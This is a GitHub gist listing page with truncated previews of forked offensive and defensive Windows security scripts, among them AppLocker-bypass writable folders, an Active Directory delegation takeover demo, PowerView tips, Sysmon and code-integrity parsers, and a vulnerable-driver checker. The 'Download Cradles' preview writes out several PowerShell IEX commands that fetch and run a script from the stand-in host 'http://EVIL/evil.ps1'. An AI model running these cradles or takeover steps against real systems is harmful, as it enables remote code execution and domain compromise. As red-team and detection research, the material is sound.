c:\Windows\ccm\inventory\noidmifs
c:\Windows\ccm\logs
c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput
Boyd Fields boydfields
boydfields
/ AppLocker-Bypass-Folderperms-CCM.md
Created
April 23, 2025 13:52
— forked from api0cradle/AppLocker-Bypass-Folderperms-CCM.md
boydfields
/ rbcd_demo.ps1
Created
April 23, 2025 13:30
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
boydfields
/ DownloadCradles.ps1
Created
April 23, 2025 13:28
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
boydfields
/ Start-FileSystemMonitor.ps1
Created
April 23, 2025 13:23
— forked from HarmJ0y/Start-FileSystemMonitor.ps1
Start-FileSystemMonitor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Start-FileSystemMonitor { | |
| <# | |
| .SYNOPSIS | |
| This function will monitor one or more file paths for any file | |
| creation, deletion, modification, or renaming events. Data including | |
| the change type, ACL for the file, etc. is output to the screen or | |
| a specified -LogFile. | |
| If -InjectShellCmd is specified, the given command is inserted into |
boydfields
/ PowerView-3.0-tricks.ps1
Created
April 23, 2025 13:20
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
boydfields
/ SysmonEventGUIDParser.ps1
Created
April 23, 2025 13:16
— forked from mattifestation/SysmonEventGUIDParser.ps1
Extracts fields from sysmon process and logon GUIDs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| $Epoch = Get-Date '01/01/1970' | |
| # Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
| $StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
| $TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
| # Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
| Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |
boydfields
/ NiftyETWProviders.json
Created
April 23, 2025 13:15
— forked from mattifestation/NiftyETWProviders.json
ETW providers you never knew existed...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a", | |
| "ProviderName": "AccEventTool", | |
| "ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba", | |
| "AssociatedFilenames": [ | |
| "accevent.exe", | |
| "inspect.exe", | |
| "narrator.exe", | |
| "srh.dll" |
boydfields
/ MDE_DataCollection_Scripts.md
Created
April 23, 2025 13:14
— forked from mattifestation/MDE_DataCollection_Scripts.md
Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.
First, they ensure that the script to execute matches the expected file hash. Example:
powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))
boydfields
/ CIPolicyParser.ps1
Created
April 23, 2025 13:12
— forked from mattifestation/CIPolicyParser.ps1
Functions to recover information from binary Windows Defender Application Control (WDAC) Code Integrity policies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ensure System.Security assembly is loaded. | |
| Add-Type -AssemblyName System.Security | |
| function ConvertTo-CIPolicy { | |
| <# | |
| .SYNOPSIS | |
| Converts a binary file that contains a Code Integrity policy into XML format. | |
| Author: Matthew Graeber (@mattifestation) |
boydfields
/ check_vulnerabledrivers.ps1
Created
April 23, 2025 13:03
— forked from api0cradle/check_vulnerabledrivers.ps1
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list | |
| # Author: Oddvar Moe - @oddvar.moe | |
| $drivers = get-childitem -Path c:\windows\system32\drivers | |
| $web_client = new-object system.net.webclient | |
| $loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json | |
| Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count) | |
| foreach ($lol in $loldrivers.KnownVulnerableSamples) | |
| { |
NewerOlder